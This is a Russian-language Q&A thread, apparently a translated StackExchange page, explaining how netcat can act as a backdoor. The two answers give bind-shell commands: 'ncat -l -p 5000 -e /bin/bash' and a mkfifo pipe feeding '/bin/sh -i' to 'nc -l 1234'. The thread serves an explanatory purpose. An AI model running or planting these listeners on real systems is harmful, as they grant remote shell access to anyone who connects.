Значение «netcat можно использовать как бэкдор» [закрыто]

-2

Я недавно читал о netcat, и часто упоминается, что его можно использовать как «черный ход». Что именно подразумевается под бэкдором? Может кто-нибудь привести пример такого использования netcat.

MKC
источник
2
Вы пробовали простой поиск в Google по запросу "netcat backdoor"?
Каран
Я получил статью в Википедии о Netcat. Это связано со статьей на черный ход. Я не мог найти, как netcat можно использовать в качестве бэкдора.
MKC
Честно говоря, это первый результат в Google.
Sirex
@Sirex: Точно. На самом деле, топ-3 результатов на данный момент: Постоянный бэкдор Netcat , Руководство по (в основном) безопасному взлому и 10 шагов по использованию NetCat в качестве бэкдора в системе Windows 7 . Отсутствие исследований становится очевидным, когда кто-то заявляет, что примеры / руководства не могут быть найдены.
Каран
Вот порядок событий, которые произошли: пару дней назад я наткнулся на эту статью, которая пробудила мое любопытство, чтобы узнать больше об этом. Итак, я попытался прочитать больше об инструменте netcat, пытаясь найти документацию по netcat на домашней странице gnu netcat , но не смог найти документацию. Я тоже прочитал его справочную страницу. Нахождение об этом конкретном использовании netcat было любопытством, а не вопросом исследования для меня. Я не думал, что будут страницы, посвященные этому. Искренние извинения.
MKC

Ответы:

1

С помощью netcat простой пользователь может создать удаленную оболочку. Например, следующая команда позволит удаленному пользователю получить доступ к оболочке bash через порт 5000

ncat -l -p 5000 -e / bin / bash

Все, что атакующий должен сделать после запуска:

IP-адрес ncat 5000

Вы даже можете попробовать этот пример на своем компьютере.

Однако это будет работать только через Интернет, если нет брандмауэра, блокирующего доступ к порту 5000.

dset0x
источник
1

Все, что может прослушивать входящие сетевые соединения (например, Perl, python, zsh, socat, inetd), можно считать бэкдором.

Основная причина, по которой я думаю, что, ncв частности, может рассматриваться скорее как бэкдор, чем другие (даже при том, что у него гораздо меньше возможностей в этом отношении), заключается в том, что на его странице руководства показан пример такого бэкдора:

       $ rm -f /tmp/f; mkfifo /tmp/f
       $ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f
сЧ
источник